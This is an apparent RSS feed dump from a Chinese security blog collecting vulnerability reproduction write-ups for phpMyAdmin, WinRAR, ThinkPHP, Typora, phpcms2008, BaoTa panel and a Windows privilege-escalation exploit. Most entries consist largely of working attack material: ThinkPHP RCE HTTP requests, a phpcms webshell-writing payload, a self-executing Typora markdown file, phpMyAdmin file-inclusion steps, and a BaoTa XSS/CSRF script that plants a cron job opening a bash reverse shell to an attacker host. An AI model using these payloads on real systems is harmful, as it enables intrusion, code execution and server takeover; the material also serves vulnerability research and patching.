专题之漏洞篇 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Sun, 01 Mar 2020 04:17:21 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 LOAD DATA LOCAL INFILE在phpmyadmin4.0.10版本后的应用 /web/1294.html Sun, 01 Mar 2020 04:17:21 +0000 /?p=1294 LOAD DATA LOCAL INFILE

很早之前就出现的问题了,文章中不会过多的复述相关知识,谷歌关键词搜索“mysql 客户端任意文件读取”。

介绍

# 简单来了解一下官方文档吧。

The LOAD DATA statement can load a file located on the server host, or, if the LOCAL keyword is specified, on the client host.

There are two potential security issues with the LOCAL version of LOAD DATA:

1. The transfer of the file from the client host to the server host is initiated by the MySQL server. In theory, a patched server could be built that would 
tell the client program to transfer a file of the server's choosing rather than the file named by the client in the LOAD DATA statement. Such a server could
access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any 
statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.)

2. In a Web environment where the clients are connecting from a Web server, a user could use LOAD DATA LOCAL to read any files that the Web server process 
has read access to (assuming that a user could run any statement against the SQL server). In this environment, the client with respect to the MySQL server 
actually is the Web server, not a remote program being run by users who connect to the Web server.

重点看这两个潜在的安全问题,简单来说就是:

  • 利用该语句可以访问客户端用户具有读取访问权限的客户端主机上的任何文件。
  • 在客户端是从web服务器进行连接的web环境中(例如:phpmyadmin),利用该语句可以读取Web服务器进程具有读取权限的任何文件。

文档中也有解释,在web充当客户端这种web环境中,相对于mysql服务器的客户端是web服务器。说的再简单一些,利用load data local infile读取文件的权限,等同于你php的权限(php为后端语言的情况),php能读/etc/passwd那用改语句也可以读。因此就产生了两个利用条件:

  • php.ini:open_basedir
  • my.ini:local_infile = 1

mysql客户端中的利用

可以看到默认secure_file_priv的value是NULL,需要我们手动去改才能使用load data infile,但是加了local后可以直接读文件,并不受这个限制。

phpmyadmin中的问题

环境为phpmyadmin5.0.1,官方最新版了吧

可以看到,插入了0行。同样是root,同样是使用了local,php也并没有设置open_basedir,很好奇为什么读不到数据。问了同事他说也没遇到过,同事通过查看phpmyadmin的源代码告诉我可以绕过(感谢我老铁的帮助Orz),同时我在phpmyadmin的官方github commit中找到了问题。

绕过限制

github 中2016年的commit

Enable LOAD DATA LOCAL INFILE only when needed

可以发现由于客户端文件读取那个漏洞,phpmyadmin将默认不能使用local infile这个功能,而是将他放入了LDI这个插件中,只有导入了该插件才可以使用该功能。

再来看一下修改的代码部分:

没有什么验证,只要post format=1即可define PMA_ENABLE_LDI =1。我下载了最新版的phpmyadmin看了一下源代码,依旧如此。

因此当可以登陆phpmyadmin却不知道根路径或者无法写文件时,也许我们又至少多了一条路可以走

最后

还跟同事开玩笑说让他赶紧交了phpmyadmin 0day,不过顶多算一个bug吧。另外如果文中出现笔误,或者哪里理解错误还望及时指出联系我更改,以免误人子弟。

]]> Winrar目录穿越漏洞复现 /web/649.html Sat, 06 Jul 2019 17:13:56 +0000 /?p=649 漏洞描述:

近日Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。

该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时,由于没有对文件名进行充分过滤,导致其可实现目录穿越,将恶意文件写入任意目录,甚至可以写入文件至开机启动项,导致代码执行

漏洞影响:

影响软件:

WinRAR < 5.70 Beta 1

Bandizip < = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩 < = 4.0.0.1170

等等…

漏洞复现:

该漏洞的实现过程:首先新建一个任意文件,然后利用WinACE进行压缩,修改filename来实现目录穿越漏洞,可以将文件解压到任意目录中。

主要所需工具WinACE、010Editor。

下载WinACE并安装,安装完成后新建一个文本文件,名字任意。

Winrar目录穿越漏洞复现-ChaBug安全

然后利用WinACE进行压缩。

Winrar目录穿越漏洞复现-ChaBug安全

设置为store full path

3通过脚本检查rar的header信息,其脚本下载地址为:

https://raw.githubusercontent.com/backlion/acefile/master/acefile.py

使用命令python acefile.py --headers test.ace来读取该文件头信息

Winrar目录穿越漏洞复现-ChaBug安全

要注意这三块

hdr_crc

hdr_size

filename的长度

filename

使用010 Editor打开ace文件进行修改(这里要注意修改顺序是从后往前的)

Winrar目录穿越漏洞复现-ChaBug安全

如果要修改filename,则需要修改上面标注这几处。第一处为0xd9e2(hdr_crc),第二处为0x0027(hdr_size),第三处为0x0008(filename的长度),以及最后一处为filename

这里修改filename为d:\d:\test.txt

长度为14,对应的hex为0x000e

Winrar目录穿越漏洞复现-ChaBug安全

然后修改hdr_size,长度为45,对应的hex为0x002d

Winrar目录穿越漏洞复现-ChaBug安全

接下来就是修改hdr_crc了,这里有一个取巧的方法。

我们再次运行命令python acefile.py --headers test.ace

程序中断并提示CorruptedArchiveError: header CRC failed

定位到错误的位置

Winrar目录穿越漏洞复现-ChaBug安全

然后去修改hdr_crc 为0xb2f3

Winrar目录穿越漏洞复现-ChaBug安全

再次查看,可以正常解析,并看到filename已经修改成功

Winrar目录穿越漏洞复现-ChaBug安全

右键解压该文件,则会在D盘生成一个test.txt文件。

Winrar目录穿越漏洞复现-ChaBug安全

解压后会在D盘生成一个test.txt文件

修复建议

  1. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1

  2. 删除UNACEV2.dll文件,解压则会报错

参考:https://fuping.site/2019/02/21/WinRAR-Extracting-Code-Execution-Validate/

]]> Thinkphp5.1 ~ 5.2 全版本代码执行 /web/643.html /web/643.html#comments Tue, 15 Jan 2019 08:02:21 +0000 /?p=643 序言

最近爆出了Thinkphp5.0.*全版本代码执行,其中5.1与5.2全版本在生产环境下下同样也存在代码执行

漏洞分析:

文件位置:\thinkphp\library\think\Request.php

    /**
     * 当前的请求类型
     * @access public
     * @param  bool $origin  是否获取原始请求类型
     * @return string
     */
    public function method($origin = false)
    {
        if ($origin) {
            // 获取原始请求类型
            return $this->server('REQUEST_METHOD') ?: 'GET';
        } elseif (!$this->method) {
            if (isset($_POST[$this->config['var_method']])) {
                $this->method    = strtoupper($_POST[$this->config['var_method']]);
                $method          = strtolower($this->method);
                $this->{$method} = $_POST;
            } elseif ($this->server('HTTP_X_HTTP_METHOD_OVERRIDE')) {
                $this->method = strtoupper($this->server('HTTP_X_HTTP_METHOD_OVERRIDE'));
            } else {
                $this->method = $this->server('REQUEST_METHOD') ?: 'GET';
            }
        }

        return $this->method;
    }

其中:

$this->method    = strtoupper($_POST[$this->config['var_method']]);
$method          = strtolower($this->method);
$this->{$method} = $_POST;

$method变量是$this->method,其同等于POST的”_method”参数值

然后该处存在一个变量覆盖

我们可以覆盖 $filter 属性值(POC如下)

c=exec&f=calc.exe&&_method=filter&

访问如下图所示:

1547216389386

会爆出一个警告级别的异常,导致程序终止

如何触发:

如果设置忽略异常提示,如下图:

1547216439115

本身项目发布就需要屏蔽异常和错误所以这个配置是一个正常的配置

Payload(POST请求):

1547216479219

弹出计算器

]]> /web/643.html/feed 1 Thinkphp5.x又双叒叕一个远程代码执行 /web/638.html Fri, 11 Jan 2019 12:44:24 +0000 /?p=638 今天thinkphp官方又双叒叕发布了5.0.24版本,包含了一个可能getshell的安全更新。在12月9日thinkphp爆出远程代码执行之后,今天晚上又爆出来远程代码执行,见官方公告

影响范围

thinkphp5.0.0~5.0.23

各版本PoC

thinkphp5.0.10版本poc如图

POST /think-5.0.10/public/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
​
s=whoami&_method=__construct&method=&filter[]=system

 

在官网最新下载的5.0.23完整版中,在App类(thinkphp/library/think/App.php)中module方法增加了设置filter参数值的代码,用于初始化filter。因此通过上述请求设置的filter参数值会被重新覆盖为空导致无法利用。

thinkphp5.0.23版本需要开启debug模式才可以利用,附两个poc: 

POST /thinkphp/public/index.php HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
​
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

 

POST /thinkphp/public/index.php?s=captcha HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
​
_method=__construct&filter[]=system&method=post&server[REQUEST_METHOD]=whoami

 

上一个rec参考链接

thinkphp5框架缺陷导致远程代码执行

https://y4er.com/post/thinkphp5.x-rce-18-12-9/

]]> Windows Read Any File /web/629.html Sat, 22 Dec 2018 07:27:21 +0000 /?p=629 近日,国外安全研究员 SandboxEscaper又一次在推特上公布了新的Windows 0 day漏洞细节及PoC。这是2018年8月开始该研究员公布的第三个windows 0day漏洞。此次披露的漏洞可造成任意文件读取。该漏洞可允许低权限用户或恶意程序读取目标Windows主机上任意文件的内容,但不可对文件进行写入操作。在微软官方补丁发布之前,所有windows用户都将受此漏洞影响。

漏洞信息

  • 预警编号 NS-2018-0041
  • 发布日期 2018-12-21
  • 危害等级 高,此漏洞可导致攻击者读取任意系统文件,PoC已公开。

Poc演示

参考链接

https://thehackernews.com/2018/12/windows-zero-day-exploit.html

]]> Phpmyadmin4.8.0~4.8.3任意文件包含 /web/628.html Fri, 21 Dec 2018 00:41:32 +0000 /?p=628 前言

2018年12月7日,phpmyadmin官方发布公告修复了一个由Transformation特性引起的任意文件包含漏洞

漏洞分析

Transformation是phpMyAdmin中的一个高级功能,通过Transformation可以对每个字段的内容使用不同的转换,每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段Filename,正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接,我们就能直接在 phpMyAdmin 中点击并在浏览器的新窗口中看到这个文件。

通常情况下Transformation的规则存储在每个数据库的pma__column_info表中,而在phpMyAdmin 4.8.0~4.8.3版本中,由于对转换参数处理不当,导致了任意文件包含漏洞的出现。

这些转换在phpMyAdmin的column_info表中定义,他通常已经存在于phpMyAdmin的系统表中。但是每个数据库都可以生成自己的版本。要为特定数据库生成phpmyadmin系统表,可以这样生成

http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*

它将会创建一个pma__*表的集合到你数据库中。

说了这么多,我们来看下具体产生漏洞的代码tbl_replace.php

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[省略]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
&& !empty($mime_map[$column_name]['input_transformation'])
) {
   $filename = 'libraries/classes/Plugins/Transformations/'
. $mime_map[$column_name]['input_transformation'];
   if (is_file($filename)) {
      include_once $filename;
      $classname = Transformations::getClassName($filename);
      /** @var IOTransformationsPlugin $transformation_plugin */
      $transformation_plugin = new $classname();
      $transformation_options = Transformations::getOptions(
         $mime_map[$column_name]['input_transformation_options']
      );
      $current_value = $transformation_plugin->applyTransformation(
         $current_value, $transformation_options
      );
      // check if transformation was successful or not
      // and accordingly set error messages & insert_fail
      if (method_exists($transformation_plugin, 'isSuccess')
&& !$transformation_plugin->isSuccess()
) {
         $insert_fail = true;
         $row_skipped = true;
         $insert_errors[] = sprintf(
            __('Row: %1$s, Column: %2$s, Error: %3$s'),
            $rownumber, $column_name,
            $transformation_plugin->getError()
         );
      }
   }
}

拼接到$filename的变量$mime_map[$column_name]['input_transformation']来自于数据表pma__column_info中的input_transformation字段,因为数据库中的内容用户可控,从而产生了任意文件包含漏洞。

漏洞利用

  1. 创建一个新的数据库foo和一个随机的bar表,在表中创建一个baz字段,然后把我们的php代码写入session 
    CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
  2. 创建phpmyadmin系统表在你的foo数据库中 
    http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
  3. 将篡改后的Transformation数据插入表pma__columninfo中:将yourSessionId替换成你的会话ID,即COOKIE中phpMyAdmin的值 
    INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'../../tmp/sess_{yourSessionId}','plop';
  4. 然后访问 
    http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

    如果利用成功,则会返回phpinfo();

]]> Typora Remote Command Execution /web/627.html Thu, 20 Dec 2018 02:59:49 +0000 /?p=627 前言

Typora是一个颜值和实力并存的markdown编辑器,我也在用。Typora基于Electron框架进行开发,今天看到了就复现下这个漏洞。

漏洞分析

在基于Electron框架开发的应用中,如果说找到了XSS漏洞,那么基本上也完成了命令执行。那么我们进行XSS盲打之后并没有收获,原因是因为Typora的作者在开发的过程中用到了https://github.com/cure53/DOMPurify,缓解了大部分的XSS攻击。

然鹅,iframe是一个神奇的标签,我们先来尝试下

<iframe src="javascript:alert(1)"></iframe>

我们来看下输出的结果

可以看到,typora把iframe这个标签的src属性会当作相对路径进行处理,那么我们来包含下本地文件试试

新建poc.md输入

<iframe src="./poc.html"></iframe>

同目录下的poc.html内容如下:

<script>
        window.parent.top.alert(1)
</script>

弹窗!

那么为什么弹窗呢?打开Devtools看下

Typora将我们的iframe标签解析成如下代码,其中sendbox是我们要注意的

<iframe src="C:\Users\Y4er\Desktop\poc.html" allow-top-navigation="false" allow-forms="false" allowfullscreen="true" allow-popups="false" sandbox="allow-same-origin allow-scripts" onload="window.remoteOnLoad(this)" height="0" data-user-height="0"></iframe>

我们看下HTML的文档中关于sendbox的说明,在html5中通过sendbox来提高iframe的安全性,而文档中也提到了

如果allow-scriptsallow-same-origin同时被设置为sendbox的属性时,那么sendbox则形同虚设

那么我们修改下我们的poc来进行命令执行

<script>
      //rce
        window.parent.top.require('child_process').execFile('C:/Windows/System32/calc.exe',function(error, stdout, stderr){
        if(error){
            console.log(error);
        }  
        });
</script>

我们捋一下思路,现在我们通过iframe的src属性引用同目录的poc.html文档,来执行命令。可是这就需要两个文件,一个poc.md,一个poc.html。繁琐,有没有办法做到一个文件就达到我们的命令执行的目的的?

尝试srcdoc

<iframe srcdoc="<script>window.parent.top.alert(1)</script>"></iframe>

并没有效果,在Devtools中我们看到sendbox的属性被设置为空,那么这是默认应用所有的沙盒限制,srcdoc不可行

尝试引入md文件

poc.md

<iframe src="./poc.md"></iframe>

cmd.md

<script>
      //rce
        window.parent.top.require('child_process').execFile('C:/Windows/System32/calc.exe',function(error, stdout, stderr){
        if(error){
            console.log(error);
        }  
        });
</script>

计算器被弹了出来

也就是说我们现在能够引入md文件,这样的话我们代码执行的命令就可以直接放到poc.md中,然后自己iframe自己就可以达到命令执行的效果了。

引用自己

构造poc.md

<iframe src="./poc.md"></iframe>
<script>
      //rce
        window.parent.top.require('child_process').execFile('C:/Windows/System32/calc.exe',function(error, stdout, stderr){
        if(error){
            console.log(error);
        }  
        });
</script>

现在我们把poc.md文件发给别人,只要他用typora打开,就会执行我们代码中的命令。

后记

这篇文章是我昨天晚上看到的,今天复现的时候发现点问题,列举下:

  1. 平台限制 基于Electron框架开发只是在win上,mac和Linux就另当别论

  2. 版本限制 我用0.9.60beta版本不能执行,看了Typora的版本日志后发现在0.9.9.56 (beta)版本中才支持video, iframe, kbd, details, ruby这类标签,漏洞也产生在这个版本,而在0.9.9.57 (beta)版本中就对此漏洞进行了修复,限制太大

参考原文链接:https://zhuanlan.zhihu.com/p/51768716

]]> Phpcms2008 Type.php Getshell /web/625.html Mon, 17 Dec 2018 07:15:23 +0000 /?p=625 前言

phpcms2008老版本type.php存在代码注入可直接getshell。不过版本过低,使用人数较少,影响范围较小,当作拓展思路不错。

漏洞简介

当攻击者向装有phpcms2008版本程序的网站发送如下payload时

/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

 

那么@unlink(_FILE_);assert($_POST[1]);这句话会被写入rss.tpl.php,即getshell。

漏洞分析

type.php$template用户可控,并且下方传入了template()函数,这个函数是在/include/global.func.php定义的,跟进下

可以看到执行了template_compile()函数,继续跟进,这个函数在/include/template.func.php

在这个方法中,$template变量同时被用于$compiledtplfile中文件路径的生成,和$content中文件内容的生成。

而前文所述的攻击payload将$template变量被设置为如下的值

tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

所以在template_compile()方法中,调用file_put_contents()函数时的第一个参数就被写成了data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php,这将被php解析成data/cache_template/rss.tpl.php

最终,@unlink(_FILE_);assert($_POST[1]);将被写入该文件。

修复建议

手动过滤$template参数,避免输入{ (这类字符被当作路径和脚本内容处理。

升级才是正道,那么老的版本了还有人在用,是有多懒。

参考链接

https://xz.aliyun.com/t/3454

]]> 宝塔面板6.x版本前台存储xss+后台csrf组合拳getshell /web/598.html Thu, 08 Nov 2018 12:29:38 +0000 /?p=598 【前言】

什么是宝塔面板?

宝塔面板是一款使用方便、功能强大且终身免费的服务器管理软件,支持Linux与Windows系统。一键配置:LAMP/LNMP、网站、数据库、FTP、SSL,通过Web端轻松管理服务器。推出至今备受中小站点站长喜爱,下载量过百万。

【漏洞代码分析】

在6.x linux版本宝塔面板当中当中,相对与5.x版本,记录了验证码错误并存入数据库当中,存储xss缺陷就是在此处产生。

我们直接看漏洞代码。

直接分析post请求部分。

代码如下:

我们可以看到这里首先判断了是否有 用户名密码,然后是验证码。判断这个IP是否是有登陆失败的记录。如果大于1 记录一下,随后将错误次数大于1的用户名的和密码都进行了记录。
从数据库中读取管理员账号密码。进行对比。如果没有成功就返回一个错误

关键的代码如下:

此处记录了一下post 的请求。然后将code传入到了写日志的一个函数里面。追踪一下这个函数。 在public.py 里面,找到如下函数

这里就是一个写日志的功能。定义了一个teyp 然后是args 。这里把code 传递过来。就直接写入了日志。没有做任何过滤处理。然后就导致了xss漏洞产生。
可以在宝塔数据库当中,看到logs数据库里存储的信息

【漏洞复现】

我们直接在面板登录处,随便输入一个账号密码,触发失败,要求输入验证码。

由于没有任何过滤处理,我们直接输入弹窗的payload:

<script>alert('www.dafsec.org')</script>

 

登录后台后,打开安全模块,成功触发弹窗。

由于服务器管理面板的特殊性,后台可以进行敏感操作。手写js远程调用,利用csrf漏洞在计划任务处配合存储xss,可成功反弹shell,弹shell成功截图如下:

远程调用的js代码如下:

function addTask(TaskName, execTime, ip, port) {
    var execShell = 'bash -i >& /dev/tcp/your_ip/your_port 0>&1';
    execShell = encodeURIComponent(execShell);
    var params = 'name=' + TaskName + '&type=minute-n&where1=' + execTime + '&hour=&minute=&week=&sType=toShell&sBody=' + execShell + '&sName=&backupTo=localhost&save=&urladdress=undefined'
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/crontab?action=AddCrontab', false);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send(params);
}

function execTask(TaskName) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/crontab?action=GetCrontab', true);
    xhr.send();
    xhr.onload = function () {
        if (this.readyState == 4 && this.status == 200) {
            var res = JSON.parse(this.responseText);
            if (res[0].name == TaskName) {
                var TaskID = res[0].id.toString();
                var xhr = new XMLHttpRequest();
                xhr.open('POST', '/crontab?action=StartTask', false);
                xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                var params = 'id=' + TaskID;
                xhr.send(params);
                delTask(res[0].id);
                console.log(res[0].id);
                return res[0].id;
            }
        }
    }
}

function delTask(TaskID) {
    var params = 'id=' + TaskID.toString();
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/crontab?action=DelCrontab', false);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send(params);
}

var TaskName = Math.random().toString(36).substring(7);
addTask(TaskName, '5', '1.1.1.1', '53');
execTask(TaskName);

 

【后序】

宝塔官方已修复该漏洞,但仍有大量存在漏洞主机暴露于公网,请及时更新至最新版本。
官方已修复该漏洞,漏洞环境可以将附件当中的test.py同名覆盖掉宝塔最新版的/www/server/panel/class/userlogin.py

]]> CVE-2018-8120 Windows LPE exploit /tools/588.html Fri, 19 Oct 2018 08:34:49 +0000 /?p=588 CVE-2018-8120 Windows LPE exploit

Supports both x32 and x64.

Tested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64.

image

Usage

CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
Usage: exp.exe command
Example: exp.exe "net user admin admin /ad"

 

Download

https://github.com/unamer/CVE-2018-8120/

Caution

  • Please exclude shellcode.asm if you wanna compile x32 version.

Reference

tips:

metasploit集成了脚本,见下面链接

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

 

]]>